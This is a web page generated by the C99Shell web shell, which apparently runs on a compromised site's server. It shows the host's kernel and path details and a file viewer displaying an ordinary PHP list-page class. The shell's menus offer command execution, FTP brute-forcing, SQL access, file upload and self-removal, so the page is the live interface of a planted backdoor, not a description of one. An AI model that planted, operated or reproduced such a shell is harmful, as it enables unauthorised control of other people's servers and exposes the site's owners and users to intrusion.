!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/data/classes/   drwxr-xr-x
Free 30.73 GB of 49.93 GB (61.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     listpage_dppopup.php (1.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

class ListPage_DPPopup extends ListPage_DPInline
{    

    
    
/**
     * Show the page.
     * It's supposed to be displayed in response on an ajax-like request
     */
    
public function showPage()
    {                
        
$returnJSON = array();

        
$this->xt->assign("view_column"false);
        
$this->xt->assign("edit_column"false);
        
$this->xt->assign("inlineedit_column"false);
        
$this->xt->assign("inlinesave_column"false);
        
$this->xt->assign("inlinecancel_column"false);
        
$this->xt->assign("copy_column"false);
        
$this->xt->assign("checkbox_column"false);
        
$this->xt->assign("dtable_column"false);
        
        
$this->xt->prepare_template($this->templatefile);

    
        
$returnJSON["success"] = true;
        
$returnJSON["counter"] = postvalue("counter");
        
$detFoundMessage "Details found";
        
$returnJSON["body"] = "<span>" $detFoundMessage ": <strong>" $this->numRowsFromSQL "</strong></span>" .$this->xt->fetch_loaded("grid_block");
        
        echo 
printJSON($returnJSON);
        exit;
    }
    
    protected function 
assignSessionPrefix() 
    {
        
$this->sessionPrefix $this->tName."_preview";    
    }

    function 
assignColumnHeaders() 
    {
        
//    show headers
        
foreach( $this->listFields as $f
        {
            
$this->xt->assignGoodFieldname$f['fName'] ) . "_fieldheader"true );            
        }
    }
    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0018 ]--